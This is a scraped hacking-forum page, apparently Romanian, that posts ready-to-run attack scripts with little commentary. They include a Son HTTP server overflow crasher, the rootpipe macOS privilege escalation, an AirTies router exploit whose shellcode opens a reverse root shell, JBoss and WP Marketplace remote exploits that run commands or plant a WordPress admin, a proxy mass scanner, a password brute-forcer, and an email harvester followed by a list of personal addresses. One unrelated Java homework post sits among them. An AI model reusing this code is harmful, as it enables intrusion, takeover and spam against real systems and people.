Search the Community

.

# Exploit Title: Son HTTP HServer stack buffer overflow # Date: 2015 June # Author: sleed - [URL="http://www.rstforums.com"]Romanian Security Team - Homepage[/URL] & Pwnthecode.org # Version: 0.9 # Tested on: Windows 8 # # Description: A simple bof denial of service in Son HTTP HServer # # import socket import struct payload = "\x42\x41\x43" * 80392 payload += "\x81\xc4\xf0\xea\xff\xff" + "B" * 70330 payload += "\x0r" + "C" * 110030 print "[+] sending payload: ", len(payload) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.0.100", 80)) buf = ( "GET /" + payload + " HTTP/1.1\r\n" + "Host: 192.168.0.101" + "\r\n\r\n" ) s.send(buf) s.close() //Cine are chef sa-si bata capul, sa TREACA DE ASLR si DEP e my guest

Am cumparat acum cateva zile de la cineva acest scanner si in 2 zile de scanat cu el tot astept sa prind si eu 1 socks. ) Poate nu stiu eu sa-l folosesc rog pe cei care il testeaza sa posteze un feedback . python scanner.py start_ip-end_ip import sys import os import socket import urllib from random import randint def get_ports(): port=[] for i in range(0,65536): if(i!=80 and i!=1080): port.append(i) return port ports = get_ports() get_host = "https://www.google.com" socket.setdefaulttimeout(3) def getGeo(ip): return urllib.urlopen('http://ipinfo.io/'+ip+'/country').read() def get_ips(start_ip, stop_ip): ips = [] tmp = [] for i in start_ip.split('.'): tmp.append("%02X" % long(i)) start_dec = long(''.join(tmp), 16) tmp = [] for i in stop_ip.split('.'): tmp.append("%02X" % long(i)) stop_dec = long(''.join(tmp), 16) while(start_dec < stop_dec + 1): bytes = [] bytes.append(str(int(start_dec / 16777216))) rem = start_dec % 16777216 bytes.append(str(int(rem / 65536))) rem = rem % 65536 bytes.append(str(int(rem / 256))) rem = rem % 256 bytes.append(str(rem)) ips.append(".".join(bytes)) start_dec += 1 return ips def scan(ip): vuln = open('vuln.txt', 'a') for port in ports: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) print "Am gasit unu!\n" vuln.write(ip + ":" + str(port)+'|'+getGeo(ip)+'\n') vuln.flush() s.send("GET " + get_host + " HTTP/1.0\r\n") s.send("\r\n") while 1: data = s.recv(1024) if not data: break print data s.close() except socket.error: print 'Scanez..' if len(sys.argv) < 2: print sys.argv[0] + "IP: start-end" sys.exit(1) else: if len(sys.argv) == 3: get_host = sys.argv[2] if sys.argv[1].find('-') > 0: start_ip, stop_ip = sys.argv[1].split("-") ips = get_ips(start_ip, stop_ip) while len(ips) > 0: i = randint(0, len(ips) - 1) aip = str(ips[i]) del ips[i] scan(aip) else: scan(sys.argv[1])

.

.

.

######################################################## # # PoC exploit code for rootpipe (CVE-2015-1130) # # Created by Emil Kvarnhammar, TrueSec # # Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2 # ######################################################## import os import sys import platform import re import ctypes import objc import sys from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions from Foundation import NSAutoreleasePool def load_lib(append_path): return ctypes.cdll.LoadLibrary("/System/Library/PrivateFrameworks/" + append_path); def use_old_api(): return re.match("^(10.7|10.8)(.\d)?$", platform.mac_ver()[0]) args = sys.argv if len(args) != 3: print "usage: exploit.py source_binary dest_binary_as_root" sys.exit(-1) source_binary = args[1] dest_binary = os.path.realpath(args[2]) if not os.path.exists(source_binary): raise Exception("file does not exist!") pool = NSAutoreleasePool.alloc().init() attr = NSMutableDictionary.alloc().init() attr.setValue_forKey_(04777, NSFilePosixPermissions) data = NSData.alloc().initWithContentsOfFile_(source_binary) print "will write file", dest_binary if use_old_api(): adm_lib = load_lib("/Admin.framework/Admin") Authenticator = objc.lookUpClass("Authenticator") ToolLiaison = objc.lookUpClass("ToolLiaison") SFAuthorization = objc.lookUpClass("SFAuthorization") authent = Authenticator.sharedAuthenticator() authref = SFAuthorization.authorization() # authref with value nil is not accepted on OS X <= 10.8 authent.authenticateUsingAuthorizationSync_(authref) st = ToolLiaison.sharedToolLiaison() tool = st.tool() tool.createFileWithContents_path_attributes_(data, dest_binary, attr) else: adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration") WriteConfigClient = objc.lookUpClass("WriteConfigClient") client = WriteConfigClient.sharedClient() client.authenticateUsingAuthorizationSync_(None) tool = client.remoteProxy() tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0) print "Done!" del pool

Salut am de facut un mini paint la facultate . Creati un editor grafic simplu, cu 3 butoane: de adaugare in fereastra a unui cerc, de adaugare a unui patrat si de stergere a unei forme (cerc sau patrat) -forma ce se poate selecta cu mouse-ul. /** * Created by on 4/6/2015. */ import javax.swing.*; import java.awt.*; import java.awt.event.ActionEvent; import java.awt.event.ActionListener; import java.awt.event.MouseEvent; import java.awt.event.MouseListener; import java.awt.geom.Ellipse2D; import java.util.ArrayList; /** * Created by Angheluta on 4/6/2015. */ public class Main extends JFrame implements ActionListener,MouseListener{ JButton b1; JButton b2; JButton b3; int x,y,x1,y1; int x3,y3; String nume=" "; ArrayList<Dreptunghi> dreptunghis = new ArrayList<Dreptunghi>(); ArrayList<cerc> cercs =new ArrayList<cerc>(); public Main(){ b1 =new JButton("Dreptunghi"); b1.setBounds(10,20,100,20); b1.addActionListener(this); b2 =new JButton("Cerc"); b2.setBounds(120,20,100,20); b2.addActionListener(this); b3 =new JButton("Sterge"); b3.setBounds(220,20,100,20); b3.addActionListener(this); addMouseListener(this); add(b1); add(b2); add(b3); setLayout(null); setSize(600,600); setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); setVisible(true); } public void paint(Graphics g) { if(nume.equals("Dreptunghi")) { for (Dreptunghi d : dreptunghis) { d.paint(g); } } if(nume.equals("Cerc")) { for(cerc c : cercs) { c.paint(g); } } } @M2G

#!/usr/bin/env python ##################################################################################### # Exploit for the AIRTIES Air5650v3TT # Spawns a reverse root shell # Author: Batuhan Burakcin # Contact: batuhan@bmicrosystems.com # Twitter: @batuhanburakcin # Web: [url]http://www.bmicrosystems.com[/url] ##################################################################################### import sys import time import string import socket, struct import urllib, urllib2, httplib if __name__ == '__main__': try: ip = sys.argv[1] revhost = sys.argv[2] revport = sys.argv[3] except: print "Usage: %s <target ip> <reverse shell ip> <reverse shell port>" % sys.argv[0] host = struct.unpack('>L',socket.inet_aton(revhost))[0] port = string.atoi(revport) shellcode = "" shellcode += "\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff\xfd" shellcode += "\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff" shellcode += "\x8f\xa4\xff\xff\x34\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0" shellcode += "\x3c\x0e" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1] shellcode += "\x35\xce" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1] shellcode += "\xaf\xae\xff\xe4" shellcode += "\x3c\x0e" + struct.unpack('>cccc',struct.pack('>I', host))[0] + struct.unpack('>cccc',struct.pack('>I', host))[1] shellcode += "\x35\xce" + struct.unpack('>cccc',struct.pack('>I', host))[2] + struct.unpack('>cccc',struct.pack('>I', host))[3] shellcode += "\xaf\xae\xff\xe6\x27\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27" shellcode += "\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x11\xff\xfd\x02\x20\x88\x27" shellcode += "\x8f\xa4\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c" shellcode += "\x24\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff" shellcode += "\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f" shellcode += "\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec" shellcode += "\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab" shellcode += "\x01\x01\x01\x0c" data = "\x41"*359 + "\x2A\xB1\x19\x18" + "\x41"*40 + "\x2A\xB1\x44\x40" data += "\x41"*12 + "\x2A\xB0\xFC\xD4" + "\x41"*16 + "\x2A\xB0\x7A\x2C" data += "\x41"*28 + "\x2A\xB0\x30\xDC" + "\x41"*240 + shellcode + "\x27\xE0\xFF\xFF"*48 pdata = { 'redirect' : data, 'self' : '1', 'user' : 'tanri', 'password' : 'ihtiyacmyok', 'gonder' : 'TAMAM' } login_data = urllib.urlencode(pdata) #print login_data url = 'http://%s/cgi-bin/login' % ip header = {} req = urllib2.Request(url, login_data, header) rsp = urllib2.urlopen(req) Source

/* * JBoss JMXInvokerServlet Remote Command Execution * JMXInvoker.java v0.3 - Luca Carettoni @_ikki * * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...). * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation" * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console" * and the "JMX Console" are protected or disabled. * * [FAQ] * * Q: Is my target vulnerable? * A: If http://<target>:8080/invoker/JMXInvokerServlet exists, it's likely exploitable * * Q: How to fix it? * A: Enable authentication in "jmx-invoker-service.xml" * * Q: Is this exploit version-dependent? * A: Unfortunately, yes. An hash value is used to properly invoke a method. * At least comparing version 4.x and 5.x, these hashes are different. * * Q: How to compile and launch it? * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java * java -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker * Yes, it's a Java exploit. I can already see some of you complaining.... */ import java.io.BufferedReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.io.ObjectOutputStream; import java.lang.reflect.Array; import java.lang.reflect.Field; import java.lang.reflect.Method; import java.net.ConnectException; import java.net.HttpURLConnection; import java.net.URL; import javax.management.MalformedObjectNameException; import javax.management.ObjectName; import org.jboss.invocation.MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir) public class JMXInvokerServlet { //---------> CHANGE ME <--------- static final int hash = 647347722; //Weaponized against JBoss 4.0.3SP1 static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet"; static final String cmd = "touch /tmp/exectest"; //------------------------------- public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException { System.out.println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]"); //Create a malicious Java serialized object MarshalledInvocation payload = new MarshalledInvocation(); payload.setObjectName(new Integer(hash)); //Executes the MBean invoke operation Class<?> c = Class.forName("javax.management.MBeanServerConnection"); Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class); payload.setMethod(method); //Define MBean's name, operation and pars Object myObj[] = new Object[4]; //MBean object name myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer"); //Operation name myObj[1] = new String("createScriptDeployment"); //Actual parameters myObj[2] = new String[]{"Runtime.getRuntime().exec(\"" + cmd + "\");", "Script Name"}; //Operation signature myObj[3] = new String[]{"java.lang.String", "java.lang.String"}; payload.setArguments(myObj); System.out.println("\n--[*] MarshalledInvocation object created"); //For debugging - visualize the raw object //System.out.println(dump(payload)); //Serialize the object try { //Send the payload URL server = new URL(url); HttpURLConnection conn = (HttpURLConnection) server.openConnection(); conn.setRequestMethod("POST"); conn.setDoOutput(true); conn.setDoInput(true); conn.setUseCaches(false); conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"); conn.setRequestProperty("Connection", "keep-alive"); conn.setRequestProperty("User-Agent", "Java/1.6.0_06"); conn.setRequestProperty("Content-Type", "application/octet-stream"); conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate"); conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation"); ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream()); wr.writeObject(payload); System.out.println("\n--[*] MarshalledInvocation object serialized"); System.out.println("\n--[*] Sending payload..."); wr.flush(); wr.close(); //Get the response InputStream is = conn.getInputStream(); BufferedReader rd = new BufferedReader(new InputStreamReader(is)); String line; StringBuffer response = new StringBuffer(); while ((line = rd.readLine()) != null) { response.append(line); } rd.close(); if (response.indexOf("Script Name") != -1) { System.out.println("\n--[*] \"" + cmd + "\" successfully executed"); } else { System.out.println("\n--[!] An invocation error occured..."); } } catch (ConnectException cex) { System.out.println("\n--[!] A connection error occured..."); } catch (IOException ex) { ex.printStackTrace(); } } /* * Raw dump of generic Java Objects */ static String dump(Object o) { StringBuffer buffer = new StringBuffer(); Class oClass = o.getClass(); if (oClass.isArray()) { buffer.append("["); for (int i = 0; i < Array.getLength(o); i++) { if (i > 0) { buffer.append(",\n"); } Object value = Array.get(o, i); buffer.append(value.getClass().isArray() ? dump(value) : value); } buffer.append("]"); } else { buffer.append("{"); while (oClass != null) { Field[] fields = oClass.getDeclaredFields(); for (int i = 0; i < fields.length; i++) { if (buffer.length() > 1) { buffer.append(",\n"); } fields[i].setAccessible(true); buffer.append(fields[i].getName()); buffer.append("="); try { Object value = fields[i].get(o); if (value != null) { buffer.append(value.getClass().isArray() ? dump(value) : value); } } catch (IllegalAccessException e) { } } oClass = oClass.getSuperclass(); } buffer.append("}"); } return buffer.toString(); } } Source

.

#!/usr/bin/python # # Exploit Name: WP Marketplace 2.4.0 Remote Command Execution # # Vulnerability discovered by Kacper Szurek (http://security.szurek.pl) # # Exploit written by Claudio Viviani # # # # -------------------------------------------------------------------- # # The vulnerable function is located on "wpmarketplace/libs/cart.php" file: # # function ajaxinit(){ # if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){ # if(function_exists($_POST['execute'])) # call_user_func($_POST['execute'],$_POST); # else # echo __("function not defined!","wpmarketplace"); # die(); # } #} # # Any user from any post/page can call wpmp_pp_ajax_call() action (wp hook). # wpmp_pp_ajax_call() call functions by call_user_func() through POST data: # # if (function_exists($_POST['execute'])) # call_user_func($_POST['execute'], $_POST); # else # ... # ... # ... # # $_POST data needs to be an array # # # The wordpress function wp_insert_user is perfect: # # http://codex.wordpress.org/Function_Reference/wp_insert_user # # Description # # Insert a user into the database. # # Usage # # <?php wp_insert_user( $userdata ); ?> # # Parameters # # $userdata # (mixed) (required) An array of user data, stdClass or WP_User object. # Default: None # # # # Evil POST Data (Add new Wordpress Administrator): # # action=wpmp_pp_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator # # --------------------------------------------------------------------- # # Dork google: index of "wpmarketplace" # # Tested on WP Markeplace 2.4.0 version with BackBox 3.x and python 2.6 # # Http connection import urllib, urllib2, socket # import sys # String manipulator import string, random # Args management import optparse # Check url def checkurl(url): if url[:8] != "https://" and url[:7] != "http://": print('[X] You must insert http:// or https:// procotol') sys.exit(1) else: return url # Check if file exists and has readable def checkfile(file): if not os.path.isfile(file) and not os.access(file, os.R_OK): print '[X] '+file+' file is missing or not readable' sys.exit(1) else: return file def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) banner = """ ___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. | | _ | _| _ | _ | _| -__|__ --|__ --| |. / \ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | `--- ---' ___ ___ __ __ __ | Y .---.-.----| |--.-----| |_.-----| .---.-.----.-----. |. | _ | _| <| -__| _| _ | | _ | __| -__| |. \_/ |___._|__| |__|__|_____|____| __|__|___._|____|_____| |: | | |__| |::.|:. | `--- ---' WP Marketplace R3m0t3 C0d3 Ex3cut10n (Add WP Admin) v2.4.0 Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """ commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]') commandList.add_option('-t', '--target', action="store", help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", ) commandList.add_option('--timeout', action="store", default=10, type="int", help="[Timeout Value] - Default 10", ) options, remainder = commandList.parse_args() # Check args if not options.target: print(banner) commandList.print_help() sys.exit(1) host = checkurl(options.target) timeout = options.timeout print(banner) socket.setdefaulttimeout(timeout) username = id_generator() pwd = id_generator() body = urllib.urlencode({'action' : 'wpmp_pp_ajax_call', 'execute' : 'wp_insert_user', 'user_login' : username, 'user_pass' : pwd, 'role' : 'administrator'}) headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'} print "[+] Tryng to connect to: "+host try: req = urllib2.Request(host+"/", body, headers) response = urllib2.urlopen(req) html = response.read() if html == "": print("[!] Account Added") print("[!] Location: "+host+"/wp-login.php") print("[!] Username: "+username) print("[!] Password: "+pwd) else: print("[X] Exploitation Failed :(") except urllib2.HTTPError as e: print("[X] "+str(e)) except urllib2.URLError as e: print("[X] Connection Error: "+str(e)) Source

#!/usr/bin/python import sys import re import string import httplib import urllib2 import re def StripTags(text): finished = 0 while not finished: finished = 1 start = text.find("<") if start >= 0: stop = text[start:].find(">") if stop >= 0: text = text[:start] + text[start+stop+1:] finished = 0 return text if len(sys.argv) != 2: print "\nExtracts emails from google results.\n" print "\nUsage : ./goog-mail.py <domain-name>\n" sys.exit(1) domain_name=sys.argv[1] d={} page_counter = 0 try: while page_counter < 50 : results = 'http://groups.google.com/groups?q='+str(domain_name)+'&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter) + '&sa=N' request = urllib2.Request(results) request.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)') opener = urllib2.build_opener() text = opener.open(request).read() emails = (re.findall('([\w\.\-]+@'+domain_name+')',StripTags(text))) for email in emails: d[email]=1 uniq_emails=d.keys() page_counter = page_counter +10 except IOError: print "Can't connect to Google Groups!"+"" page_counter_web=0 try: print "\n\n+++++++++++++++++++++++++++++++++++++++++++++++++++++"+"" print "+ Google Web & Group Results:"+"" print "+++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n"+"" while page_counter_web < 50 : results_web = 'http://www.google.com/search?q=%40'+str(domain_name)+'&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter_web) + '&sa=N' request_web = urllib2.Request(results_web) request_web.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)') opener_web = urllib2.build_opener() text = opener_web.open(request_web).read() emails_web = (re.findall('([\w\.\-]+@'+domain_name+')',StripTags(text))) for email_web in emails_web: d[email_web]=1 uniq_emails_web=d.keys() page_counter_web = page_counter_web +10 except IOError: print "Can't connect to Google Web!"+"" for uniq_emails_web in d.keys(): print uniq_emails_web+"" Sursa Test ! anci-ste@alice.it fcrovace@alice.it antorake@alice.it lauradilu@alice.it salvo_brusca67@alice.it pagescaos_calmo@alice.it claudio.maccherani@alice.it pagesaicelombarda@alice.it monicagasbarri@alice.it S.Camillo-Forlaninilportalone@alice.it materli1@alice.it lsantini@alice.it pincopallino@alice.it gratours@alice.it aicelombarda@alice.it Castrofilippofilippafarruggio@alice.it pagesfcrovace@alice.it luci.ba@alice.it poate il face cineva sa mearga mai bine prinde maxim 10-20 email-uri si se opreste .. Il rog frumos sa-mi dea si mie sau sa posteze !

#!/usr/bin/python # Cross-Site Tracer by 1N3 v20150224 # https://crowdshield.com # # ABOUT: A quick and easy script to check remote web servers for Cross-Site Tracing. For more robust mass scanning, create a list of domains or IP addresses to iterate through by running 'for a in `cat targets.txt`; do ./xsstracer.py $a 80; done;' # # USAGE: xsstracer.py <IP/host> <port> # import socket import time import sys, getopt class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' def main(argv): argc = len(argv) if argc <= 2: print bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 v20150224" + bcolors.ENDC print bcolors.OKBLUE + "+ -- --=[" + bcolors.UNDERLINE + "https://crowdshield.com" + bcolors.ENDC print bcolors.OKBLUE + "+ -- --=[usage: %s <host> <port>" % (argv[0]) + bcolors.ENDC sys.exit(0) target = argv[1] # SET TARGET port = argv[2] # SET PORT buffer1 = "TRACE / HTTP/1.1" buffer2 = "Test: <script>alert(1);</script>" buffer3 = "Host: " + target print "" print bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 " print bcolors.OKBLUE + "+ -- --=[https://crowdshield.com" print bcolors.OKBLUE + "+ -- --=[Target: " + target + ":" + port s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) result=s.connect_ex((target,int(port))) s.settimeout(1.0) if result == 0: s.send(buffer1 + "\n") s.send(buffer2 + "\n") s.send(buffer3 + "\n\n") data = s.recv(1024) script = "alert" if script.lower() in data.lower(): print bcolors.FAIL + "+ -- --=[Site vulnerable to XST!" + bcolors.ENDC print "" print bcolors.WARNING + data + bcolors.ENDC else: print bcolors.OKGREEN + "+ -- --=[Site not vulnerable to XST!" print "" print "" else: print bcolors.WARNING + "+ -- --=[Port is closed!" + bcolors.ENDC s.close() main(sys.argv) Download Source

Hadoop User Experience password cracking script. Written in Python. #!/usr/bin/python import sys import requests import datetime from fake_useragent import UserAgent ## CONFIG STARTS HERE ## user = "admin" host = "hostname:port" listfile = "~/dictionaries/top1000-worst-passwords.txt" ## CONFIG ENDS HERE## dictionary = open(listfile) list = dictionary.readlines() words = [ ] print "Initializing dictionary", for entry in list: print('.'), newword = entry.rstrip("\n") words.append(newword) print "Now testing " for password in words: ua = UserAgent().random headers = { "User-Agent" : ua } post = { "username" : user, "password" : password } r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post) invalid = r.text.find("Invalid") if invalid == -1: print "\nSuccess! " + user + ":" + password print "Completed test at ", print datetime.datetime.now() sys.exit() else: print "...." print "Attack unsuccessful...Completed at ", Source

.